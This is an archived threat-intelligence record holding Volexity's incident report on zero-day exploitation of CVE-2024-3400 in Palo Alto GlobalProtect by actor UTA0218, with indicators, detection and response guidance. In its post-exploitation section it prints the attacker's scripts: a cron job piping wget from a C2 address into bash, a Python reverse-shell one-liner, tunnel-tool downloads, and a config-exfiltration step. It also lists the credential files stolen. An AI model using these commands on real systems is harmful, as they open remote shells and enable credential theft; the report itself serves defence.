{
	"id": "590b92d5-abb7-4280-ab8b-abf35b04185b",
	"created_at": "2026-04-06T00:16:09.062022Z",
	"updated_at": "2026-04-10T03:27:54.496064Z",
	"deleted_at": null,
	"sha1_hash": "3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e",
	"title": "Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1147571,
	"plain_text": "Zero-Day Exploitation of Unauthenticated Remote Code Execution\r\nVulnerability in GlobalProtect (CVE-2024-3400)\r\nBy mindgrub\r\nPublished: 2024-04-12 · Archived: 2026-04-05 14:18:27 UTC\r\nVolexity would like to thank Palo Alto Networks for their partnership, cooperation, and rapid response\r\nto this critical issue. Their research can be found here.\r\nOn April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect\r\nfeature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity\r\nreceived alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent\r\ninvestigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed\r\nfurther, identical exploitation at another one of its NSM customers by the same threat actor.\r\nThe threat actor, which Volexity tracks under the alias UTA0218, was able to remotely exploit the firewall device,\r\ncreate a reverse shell, and download further tools onto the device. The attacker focused on exporting configuration\r\ndata from the devices, and then leveraging it as an entry point to move laterally within the victim organizations.\r\nVolexity worked closely with its customer and the Palo Alto Networks Product Security Incident Response Team\r\n(PSIRT) to investigate the root cause of the compromise. Through this cooperative investigation, the Palo Alto\r\nNetworks PSIRT team was able to confirm the vulnerability as an OS command injection issue and assigned it\r\nCVE-2024-3400. The issue is an unauthenticated remote code execution vulnerability with a CVSS base score of\r\n10.0. 
Palo Alto Networks has since issued an advisory for CVE-2024-3400 that includes information regarding a\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 1 of 14\n\nthreat protection signature released to customers, as well as a timeline for a fix, which at the time of writing is\r\nexpected April 14, 2024.\r\nDuring its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which\r\nVolexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional\r\ncommands on the device via specially crafted network requests. Details on this backdoor are included further on in\r\nthis report.\r\nAs Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and\r\norganizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability\r\nby placing zero-byte files on firewall devices to validate exploitability. On April 7, 2024, Volexity observed the\r\nattacker attempting and failing to deploy a backdoor on a customer’s firewall device. Three days later, on April 10,\r\n2024, UTA0218 was observed exploiting firewall devices to successfully deploy malicious payloads. A second\r\ncompromise Volexity observed on April 11, 2024, followed a nearly identical playbook. A timeline associated with\r\nthe discovery and subsequent activities is below.\r\nAfter successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they\r\ncontrolled in order to facilitate access to victims’ internal networks. 
They quickly moved laterally through victims’\r\nnetworks, extracting sensitive credentials and other files that would enable access during and potentially after the\r\nintrusion. The tradecraft and speed employed by the attacker suggest a highly capable threat actor with a clear\r\nplaybook of what to access to further their objectives. Volexity is not currently able to provide an estimate as to\r\nthe scale of exploitation taking place. It is likely the firewall device exploitation, followed by hands-on-keyboard\r\nactivity, was limited and targeted. However, as noted previously, evidence of potential reconnaissance activity\r\ninvolving more widespread exploitation aimed at identifying vulnerable systems does appear to have occurred at\r\nthe time of writing.\r\nVolexity strongly recommends organizations using Palo Alto Networks GlobalProtect firewall devices read the\r\nadvisory to ensure their firewall devices have the correct protections in place, or otherwise take mitigation actions\r\nto ensure they are no longer vulnerable. As always, it should be noted that these mitigations and fixes will not\r\nremediate an existing compromise. 
Affected organizations should rapidly investigate their systems and networks\r\nfor potential breaches.\r\nThis blog post describes the malware the attacker added to compromised devices, observed attempts at lateral\r\nmovement, and methods organizations can use to identify potential compromise of their networks.\r\nAnalysis\r\nInvestigation Summary\r\nVolexity used telemetry from its own network security sensors, client endpoint detection and response (EDR)\r\nsoftware, and forensic data collected from multiple systems to paint a thorough picture of the attacker’s actions in\r\nthe incidents investigated.\r\nBelow are the highlights of Volexity’s observations from the course of the performed investigations:\r\nZero-day exploitation of a vulnerability in Palo Alto Networks GlobalProtect firewall devices that allowed for\r\nunauthenticated remote code execution to take place. Initial exploitation was used to create a reverse shell,\r\ndownload tools, exfiltrate configuration data, and move laterally within the network.\r\nThe threat actor has developed and attempted to deploy a novel Python-based backdoor that Volexity calls\r\nUPSTYLE.\r\nThe earliest evidence of attempted exploitation observed by Volexity thus far is on March 26, 2024, when\r\nattackers appeared to verify that exploitation worked correctly.\r\nThe initial persistence mechanism set up by UTA0218 involved configuring a cron job that would use\r\nwget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and\r\npiped to bash for execution. 
The attacker used this method to deploy and execute specific commands and\r\ndownload reverse proxy tooling such as GOST (GO Simple Tunnel).\r\nIn one case, a service account configured for use by the Palo Alto firewall, which was also a member of the domain\r\nadmins group, was used by the attackers to pivot internally across the affected networks via SMB and\r\nWinRM.\r\nUTA0218’s initial objectives were aimed at grabbing the domain backup DPAPI keys and targeting Active\r\nDirectory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal\r\nsaved cookies and login data, along with the users’ DPAPI keys.\r\nA detailed description of the items summarized above can be found in the following sections.\r\nUPSTYLE Backdoor\r\nIn two cases UTA0218 was observed attempting to download and execute a backdoor Volexity calls UPSTYLE.\r\nThere were two slight variations of this tool observed with only minor differences between the files. In one case\r\nthe filename used by UTA0218 was update.py. UTA0218 attempted to download and execute this file via\r\nCVE-2024-3400 but was unsuccessful. However, Volexity was still able to recover the file for analysis.\r\nName(s) update.py\r\nSize 5.1KB (5187 Bytes)\r\nFile Type text/plain\r\nMD5 0c1554888ce9ed0da1583dbdf7b31651\r\nSHA1 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9\r\nSHA256 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\nVirusTotal First Submitted N/A\r\nThe purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts with an import, and its main content is stored as a\r\nbase64-encoded blob. The .pth extension is used to append additional directories to Python’s module search path. 
Starting with\r\nthe release of Python 3.5, lines in .pth files beginning with the text “import” followed by a space or a tab are\r\nexecuted, as described in the official documentation. Therefore, by creating this file, each time any other code on\r\nthe device attempts to import the module, the malicious code is executed.\r\nThe commands to be executed are forged by the attacker by requesting a non-existent web page which contains\r\nthe specific pattern. The backdoor’s purpose is to then parse the web server error log\r\n(/var/log/pan/sslvpn_ngx_error.log) looking for the pattern, and to parse and decode data added to the non-existent URI, executing the command contained within. The command output is then appended to a CSS file\r\nwhich is a legitimate part of the firewall (/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css).\r\nAfter the command’s execution is complete and the output has been written, the log entry that was originally read\r\nand contained the command is removed from the sslvpn_ngx_error.log file. Fifteen seconds after execution,\r\nthe original version of bootstrap.min.css is also restored to its previous state. The access and modified\r\ntimestamps are also restored for both files. Figure 1 shows the UPSTYLE main loop.\r\nFigure 1. UPSTYLE main loop\r\nThe overall workflow of the malware is described in Figure 2.\r\nFigure 2. UPSTYLE workflow\r\nPost-exploitation Activity\r\nFor the purpose of this blog post, the following filenames and indicators are related to the exploitation that\r\noccurred on April 10, 2024. 
However, the reader should note that in subsequent exploitation, these files were\r\naltered by UTA0218 for different victims. Their purpose and operation, though, were fundamentally the same.\r\nAfter exploitation, the threat actor established persistence by continuously fetching and executing the contents of a\r\nfile named patch. When executed, this file downloads and executes a remotely hosted file named policy. By\r\nmodifying the contents of the policy file, the threat actor was able to execute a variety of commands on the\r\ncompromised device. A total of six different permutations of the policy file were observed by Volexity.\r\nThe details of the patch file are shown below:\r\nName(s) patch\r\nSize 160.0B (160 Bytes)\r\nFile Type text/plain\r\nMD5 d31ec83a5a79451a46e980ebffb6e0e8\r\nSHA1 a7c6f264b00d13808ceb76b3277ee5461ae1354e\r\nSHA256 35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c\r\nVirusTotal First Submitted N/A\r\nThe contents of the patch file are shown below:\r\nif [ ! -f '/etc/cron.d/update' ]; then\r\n  printf \"SHELL=/bin/bash\\n\\n* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\\n\\n\" \u003e /etc/cron.d/update\r\nfi\r\nWhen executed, it checks for the existence of a cron file named update. If this cron file does not exist, it creates\r\nthe file and uses it to establish a cron job that downloads the remotely hosted policy file and executes it\r\nvia bash every 60 seconds. The attacker then manually updates the contents of the remote file over time to retrieve\r\ndata from the device and create a reverse shell.\r\nInterestingly, the attacker appeared to manually manage an access control list for this command-and-control (C2)\r\nserver, as it could not be accessed on the same port from any location other than the device communicating with it.\r\nMalicious Code Executed via Policy File\r\nSix different versions of the policy file were observed by Volexity. 
They each represent a different set of actions\r\ntaken by the threat actor on a compromised device. The versions that follow are numbered in the order in which they\r\nwere used by the threat actor.\r\nVersion 1\r\nThis file contained a one-liner reverse shell written in Python.\r\nName(s) policy\r\nSize 287B (287 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 a43e3cf908244f85b237fdbacd8d82d5\r\nSHA1 e1e427c9b46064e2b483f90b13490e6ef522cc06\r\nSHA256 755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nr=`ps -ef | grep \"import sys,socket,os\" | grep -v grep`\r\nif [[ -z \"$r\" ]]; then\r\n  python -c \"import sys,socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash')\"\r\nfi\r\nVersion 2\r\nThe attacker removed any previously created CSS files containing various attacker command output, and then\r\ncopied the configuration data from the firewall device into a new file, storing the hostname of the device in the\r\nCSS file. 
These files were saved to an externally accessible web directory where the attacker could subsequently\r\nretrieve them.\r\nName(s) policy\r\nSize 216B (216 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 5e4c623296125592256630deabdbf1d2\r\nSHA1 d12b614e9417c4916d5c5bb6ee42c487c937c058\r\nSHA256 adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nrm -f /var/appweb/sslvpndocs/global-protect/*.css\r\ncp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/\u003credacted\u003e.css\r\nuname -a \u003e /var/appweb/sslvpndocs/global-protect/\u003credacted\u003e.css\r\nVersion 3\r\nThis file was used to remove the CSS files created in the previous step.\r\nName(s) policy\r\nSize 62B (62 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 87312a7173889a8a5258c68cac4817bd\r\nSHA1 3ad9be0c52510cbc5d1e184e0066d14c1f394d4d\r\nSHA256 c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nrm -f /var/appweb/sslvpndocs/global-protect/*.css\r\nVersion 4\r\nThis version attempts to download a Golang tunneling tool named GOST and execute it with two different\r\ncommand-line options to establish SOCKS5 and RTCP tunnels. 
However, the threat actor appears to have failed to\r\nsuccessfully download the tool on this attempt.\r\nName(s) policy\r\nSize 388B (388 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 b9f5e9db9eec8d1301026c443363cf6b\r\nSHA1 d7a8d8303361ffd124cb64023095da08a262cab4\r\nSHA256 fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/vpn_prot.gz -O /tmp/vpn_prot.gz\r\nls -l /tmp/vpn_prot.gz \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\ngzip -d /tmp/vpn_prot.gz\r\nchmod +x /tmp/vpn_prot\r\nnohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 \u003e /dev/null 2\u003e\u00261 \u0026\r\nnohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/127.0.0[.]1:8123 -F ssh://user0:[password_redacted]@172.233.228[.]93:8443?ping=180 \u003e /dev/null 2\u003e\u00261 \u0026\r\nVersion 5\r\nThis is a modified version of Version 4 that successfully downloads GOST in a base64-encoded format.\r\nName(s) policy\r\nSize 421B (421 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 12b5e30c2276664e87623791085a3221\r\nSHA1 f99779a5c891553ac4d4cabf928b2121ca3d1a89\r\nSHA256 96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/vpn.log -O /tmp/vpn.log\r\nbase64 -d /tmp/vpn.log \u003e /tmp/vpn_prot.gz\r\nls -l /tmp/vpn_prot.gz \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\ngzip -d /tmp/vpn_prot.gz\r\nchmod +x /tmp/vpn_prot\r\nnohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 \u003e /dev/null 2\u003e\u00261 \u0026\r\nnohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/127.0.0.1:8123 -F ssh://user0:[password_redacted]@172.233.228[.]93:8443?ping=180 \u003e /dev/null 2\u003e\u00261 \u0026\r\nThe details of the GOST sample are as follows:\r\nName(s) 
gost-linux-amd64\r\nSize 12.9MB (13578240 Bytes)\r\nFile Type ELF\r\nMD5 089801d87998fa193377b9bfe98e87ff\r\nSHA1 4ad043c8f37a916761b4c815bed23f036dfb7f77\r\nSHA256 448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c\r\nVirusTotal First Submitted 2023-01-29 01:30:47 UTC | af632c50 (api) – Unknown US\r\nVersion 6\r\nThis file contains commands to download and execute an open-source reverse shell that operates over SSH. The\r\nthreat actor configures this shell to run on port 31289.\r\nName(s) policy(6)\r\nSize 189.0B (189 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 724c8059c150b0f3d1e0f80370bcfe19\r\nSHA1 5592434c40a30ed2dfdba0a86832b5f2eaaa437c\r\nSHA256 e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/lowdp -O /tmp/lowdp\r\nls -l /tmp/lowdp \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\nchmod +x /tmp/lowdp\r\nnohup /tmp/lowdp -l -p 31289 \u003e /dev/null 2\u003e\u00261 \u0026\r\nDetails of the binary are shown below:\r\nName(s) reverse-sshx64\r\nSize 3.5MB (3690496 Bytes)\r\nFile Type ELF\r\nMD5 427258462c745481c1ae47327182acd3\r\nSHA1 ef8036eb4097789577eff62f6c9580fa130e7d56\r\nSHA256 161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6\r\nVirusTotal First Submitted 2022-08-08 18:30:19 UTC | 1c0b809a (web) – Unknown NL\r\nLateral Movement \u0026 Data Theft\r\nIn one instance of successful compromise, a highly privileged service account used by the Palo Alto Networks\r\nfirewall device was used by the attacker to pivot into the internal network via SMB and WinRM. 
The targeted data\r\nincluded the Active Directory database (ntds.dit), key data (DPAPI) and Windows event logs (Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx).\r\nIn addition to Windows-related data, the attacker also stole Login Data, Cookies, and Local State data for\r\nChrome and Microsoft Edge from specific targets. With this data, the attacker was able to grab the browser master\r\nkey and decrypt sensitive data, such as stored credentials.\r\nThe list of files grabbed by the attacker is below:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Login Data\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Local State\r\n%APPDATA%\\Roaming\\Microsoft\\Protect\\\u003cSID\u003e -\u003e DPAPI Keys\r\n%SystemRoot%\\NTDS\\ntds.dit\r\n%SystemRoot%\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx\r\nUTA0218 was not observed deploying malware or additional methods of persistence on systems within victim\r\nnetworks. This may be due in part to the rapid detection and response by Volexity and its customers. The stolen\r\ndata did allow the attacker to effectively compromise credentials for all domain accounts. 
Further, the attacker\r\ngained access to valid credentials or cookies taken from the browser data of the specific user workstations they\r\naccessed, and could potentially use them.\r\nInfrastructure\r\nVolexity observed UTA0218 leveraging a mix of infrastructure during their operations, which can be broadly\r\nbroken into two categories:\r\nC2 infrastructure hosting malware, used for communication channels\r\nAnonymized source infrastructure, used to access tooling and interact with victim infrastructure\r\nThe anonymized infrastructure appears to have included a mix of VPN usage, as well as potentially compromised\r\nASUS routers. The infrastructure was used to access files created by the attacker. Additionally, UTA0218 abused a\r\ncompromised AWS bucket and various Virtual Private Server (VPS) providers to store malicious files. The\r\ninfrastructure observed by Volexity does not have any overlaps with other threat actors in Volexity’s aperture at\r\nthis time.\r\nDetecting Compromise\r\nThere are two primary methods for identifying compromise on an impacted firewall device. The first method\r\ninvolves monitoring network traffic and activity emanating from Palo Alto Networks firewall devices. Volexity is\r\nstill working to coordinate with Palo Alto Networks regarding the second method and thus is not describing it at\r\nthis time. Volexity will update this blog post when more details can be made available.\r\nThe section that follows describes what organizations can do to look for signs of compromise. 
Any of these\r\nmethods can provide strong evidence that the Palo Alto Networks GlobalProtect firewall device is compromised.\r\nShould signs of compromise be identified, refer to Responding to Compromise for what to do next.\r\nNetwork Traffic Analysis\r\nVolexity initially identified activity that led to the discovery of the Palo Alto Networks GlobalProtect firewall\r\ndevice exploitation via an alert for malicious network requests generated by Volexity’s NSM sensors. Review of\r\nnetwork traffic logs for outbound connections originating from the GlobalProtect firewall device, as well as\r\ndestined for the device, can help identify anomalous activity. Example activity that Volexity observed from\r\ncompromised GlobalProtect devices includes the following:\r\nDirect-to-IP HTTP requests to download files noted in the previous section via wget\r\nWhile it would not be uncommon to observe wget requests for files in a larger environment, this type of\r\nrequest originating from the firewall device is not something Volexity has observed outside of the attacker\r\nactivity.\r\nSMB / RDP connections to multiple systems across the environment, originating from the GlobalProtect\r\nappliance\r\nSMB file transfers of Google Chrome or Microsoft Edge browser data or the ntds.dit file\r\nHTTP request for the URL worldtimeapi[.]org/api/timezone/etc/utc originating from the GlobalProtect\r\nappliance\r\nWhile this hostname is legitimate, in both occurrences of compromise an HTTP GET request to this URL\r\nwas observed. This does not appear to be a commonly occurring network request.\r\nVolexity also leveraged its customer’s Endpoint Detection and Response (EDR) software to investigate alerts that\r\ntriggered for data exfiltration over SMB. 
Having both network visibility and EDR telemetry allowed Volexity to\r\nfully map out all systems the attacker accessed via the compromised GlobalProtect firewall device.\r\nGlobalProtect Firewall Device Log Analysis\r\nDuring Volexity’s incident response investigations, the affected customers were able to generate a tech support file\r\nfrom the compromised firewall devices. This tech support file is an archive that contains files Palo Alto Networks\r\ntech support can use to troubleshoot issues organizations are having with their firewall devices. It also contains\r\nlogs that Volexity noted as having key forensic artifacts that could potentially help determine if a device is\r\ncompromised.\r\nTo generate a tech support file, Palo Alto GlobalProtect system administrators can navigate within the WebGUI to\r\nthe Device tab, or if in Panorama to the Panorama tab. From here, navigate to the “Support” page and look under\r\nthe Tech Support File section for “Generate Tech Support File.” Clicking this will generate a tech support file that\r\ncan be downloaded by selecting “Download Tech Support File” when it becomes available. This may also be done\r\nvia the command-line interface using one of two commands:\r\ntftp export tech-support to \u003ctftp host\u003e\r\nscp export tech-support to \u003cusername@host:path\u003e\r\nMore information on this process from Palo Alto Networks can be found here.\r\nVolatile Memory Collection\r\nCollecting volatile memory from potentially compromised devices requires assistance from Palo Alto Networks\r\ntechnical support. 
It is not currently possible for Palo Alto Networks customers to collect memory on their own.\r\nDue to these collection challenges, Volexity products currently do not officially support Palo Alto Networks\r\nfirewall devices.\r\nVolatile Memory Analysis with Volexity Volcano\r\nVolexity regularly leverages memory forensics when investigating or confirming compromises. Due to the\r\nsensitive nature of the artifacts in memory and the pending coordination efforts with Palo Alto Networks, Volexity\r\nwill share more details of this analysis with Volexity Volcano in a future update.\r\nResponding to Compromise\r\nIf you discover that your Palo Alto Networks GlobalProtect firewall device is compromised, it is important to take\r\nimmediate action. Make sure to not wipe or rebuild the appliance. Collecting logs, generating a tech support file,\r\nand preserving forensic artifacts (memory and disk) from the device are crucial.\r\nPivoting to analyzing internal systems and tracking potential lateral movement should be done as soon as possible.\r\nFurther, any credentials, secrets, or other sensitive data that may have been stored on the GlobalProtect firewall\r\ndevice should be considered compromised. This may warrant password resets, changing of secrets, and additional\r\ninvestigations.\r\nVolexity strongly recommends that organizations look for signs of lateral movement internally from their Palo\r\nAlto Networks GlobalProtect firewall device that are not consistent with expected behavior. Proactive checks of\r\nany externally facing infrastructure may also be warranted if internal visibility is limited.\r\nIf you need assistance validating or responding to a breach, please feel free to contact Volexity for breach\r\nassistance.\r\nConclusion\r\nTargeting edge devices remains a popular vector of attack for capable threat actors who have the time and\r\nresources to invest in researching new vulnerabilities. 
Having a robust detection stack is critical in identifying\r\nactivity related to exploits, including network monitoring and EDR capabilities to identify lateral movement.\r\nEarly detection of intrusions greatly reduces the scope and costs associated with mitigation.\r\nVolexity tracks activity described in this blog post under the moniker UTA0218. At the time of writing, Volexity\r\nwas unable to link the activity to other threat activity. Volexity assesses that it is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type\r\nof victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access\r\nvictim networks.\r\nAs with previous public disclosures of vulnerabilities in these kinds of devices, Volexity assesses that it is likely a\r\nspike in exploitation will be observed over the next few days by UTA0218 and potentially other threat actors who\r\nmay develop exploits for this vulnerability. This spike in activity will be driven by the urgency of this window of\r\naccess closing due to mitigations and patches being deployed. 
It is therefore imperative that organizations act\r\nquickly to deploy recommended mitigations and perform compromise reviews of their devices to check whether\r\nfurther internal investigation of their networks is required.\r\nThis blog post provided guidance on prevention and detection; related indicators can also be downloaded from the\r\nVolexity GitHub page:\r\nYARA rules\r\nSingle value indicators\r\nFor more information about Volexity’s Network Security Monitoring service or Volexity’s leading\r\nmemory analysis product, Volexity Volcano, please do not hesitate to contact us.\r\nSource: https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"MITRE"
	],
	"references": [
		"https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
	],
	"report_names": [
		"zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "38cecfb3-e717-4b4a-9792-f95e4ba4521d",
			"created_at": "2024-04-23T02:00:04.248176Z",
			"updated_at": "2026-04-10T02:00:03.632032Z",
			"deleted_at": null,
			"main_name": "UTA0218",
			"aliases": [],
			"source_name": "MISPGALAXY:UTA0218",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434569,
	"ts_updated_at": 1775791674,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.pdf",
		"text": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.txt",
		"img": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.jpg"
	}
}